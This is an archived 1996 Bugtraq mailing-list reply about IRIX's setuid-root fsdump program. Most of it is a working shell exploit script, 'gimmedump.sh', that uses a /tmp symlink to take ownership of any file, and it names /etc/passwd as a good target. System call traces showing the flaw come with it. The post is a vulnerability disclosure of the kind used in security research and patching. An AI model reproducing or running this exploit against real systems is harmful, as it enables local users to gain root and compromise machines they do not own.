Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1996_4

Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: Irix: more suid fun/exploits

Re: Irix: more suid fun/exploits

Jaechul Choe (poisoncosmos.kaist.ac.kr)
Tue, 3 Dec 1996 00:03:54 +0900

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Troy Bollinger: "Re: Users can modify routing in AIX 4.1"
Previous message: Dave Roberts: "Users can modify routing in AIX 4.1"
In reply to: Yuri Volobuev: "Irix: more suid fun/exploits"

> ABSTRACT
>
> /var/rfindd/fsdump is owned by root, has suid bit set by default and has
> bugs.  It allows local users to create zero-length files anywhere on the
> system.  If the file already exists, content is lost.  With little work, it
> can be converted to root compromise. 5.3 is is affected, 6.2 doesn't seem to
> have it, at least not on a standard installation.
>

Exploiting fsdump just one time you can change the owner of any file
to yourself. Didn't you see the program changes the owner of .pag & .dir files
to the user running it?
I've found the bug several weeks ago and now post a lame exploit script
that was put aside.

IRIX 6.2's fsdump was vulnerable also. Is it safe from the zero length
.lock file creation?

-------)<--------------------------------------------------------)<-------
#!/bin/sh
# gimmedump.sh
#
# This exploits the serious vulnerability in IRIX's fsdump(1M) program
# and attempts to change the owner of an arbitrary file to yourself.
# (You know /etc/passwd is an excellent target.)
# Tested on both IRIX 5.3 and IRIX64 6.2
# I think this bug may be exploited on any version of IRIX machines
# currently running.
# Here are some system call traces on the program, which show what
# the problem is:
#
#  379mS getuid() = 1128 euid=0
#  379mS getuid() = 1128 euid=0
#  379mS getuid() = 1128 euid=0
#  379mS getgid() = 20 egid=20
#  379mS chdir(/usr/var/tmp/) OK
#  380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
#  380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
#  380mS chmod(fsdump.pag, 0644) OK
#  380mS chown(fsdump.pag, 1128, 20) OK
#  380mS chmod(fsdump.dir, 0644) OK
#  381mS chown(fsdump.dir, 1128, 20) OK
#
# 1996 10.23    Jaechul Choe, CS Dept. in KAIST, Republic of Korea
#               poisonworak.kaist.ac.kr

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

if [ ! -f /var/rfindd/fsdump ]; then
        echo "fsdump doesn't exist! - exiting"
        exit 1
fi

cd /tmp
ln -s $1 fsdump.dir
echo "Be patient! It will take some time to run."
echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
/var/rfindd/fsdump -Fgimme /
echo "\nDone. Here is the result."
ls -al $1
rm -f fsdump.dir fsdump.pag gimme
exit 0

Next message: Troy Bollinger: "Re: Users can modify routing in AIX 4.1"
Previous message: Dave Roberts: "Users can modify routing in AIX 4.1"
In reply to: Yuri Volobuev: "Irix: more suid fun/exploits"